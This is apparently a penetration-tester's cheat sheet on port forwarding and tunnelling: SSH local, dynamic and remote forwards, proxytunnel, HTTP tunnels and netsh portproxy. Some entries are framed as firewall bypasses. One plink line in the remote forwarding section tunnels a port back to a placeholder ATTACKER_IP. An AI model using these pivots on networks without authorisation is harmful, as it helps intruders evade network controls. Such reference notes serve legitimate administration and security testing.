# Port Forwarding

## SSH Local Port Forwarding

```
ssh  -L 6999:localhost:5901 user@192.168.1.3

user@192.168.1.3 = SSH host to connect to
-L = Option to enable local port forwarding
6999 = Port on the client PC
localhost = Host server to connect to (the remote PC, same as 127.0.0.1)
5901 = Port on the remote host (forwarded from the client PC)
```

{% embed url="<https://cects.com/ssh-local-and-remote-port-forwarding-with-vnc/>" %}

> Local port forwarding – A port from the client PC is forwarded to the remote PC. A connection to this port enables data to be sent bidirectionally over the SSH connection between the client and remote PC.

![](https://2774131807-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M64VB6Sr653y4KPdauj%2F-M6KgVYHU8iJpCHih1tP%2F-M6Ld12maf1nJ3_gsn-Y%2FLocalPortForwarding1.png?alt=media\&token=dfb9412f-1f72-425d-811f-1be61d90cf48)

#### SSH: Dynamic Port Forwarding

```
# Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER
# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER
```

#### SSH: Remote Port Forwarding

```
# Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389
# Scenario: expose RDP on non-routable network;
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
plink -R ATTACKER:ATTACKER_PORT:127.0.01:80 -l root -pw pw ATTACKER_IP
```

#### Proxy Tunnel

```bash
# Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128
# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;
proxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555
ssh user@127.0.0.1 -p 5555
```

#### HTTP Tunnel: SSH Over HTTP

```bash
# Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22
hts -F localhost:22 80

# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80
htc -F 8080 192.168.1.15:80

# Client - connect to localhost:8080 -> get tunneled to 192.168.1.15:80 -> get redirected to 192.168.1.15:22
ssh localhost -p 8080
```

#### Netsh - Windows Port Forwarding

```bash
# requires admin
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
```

###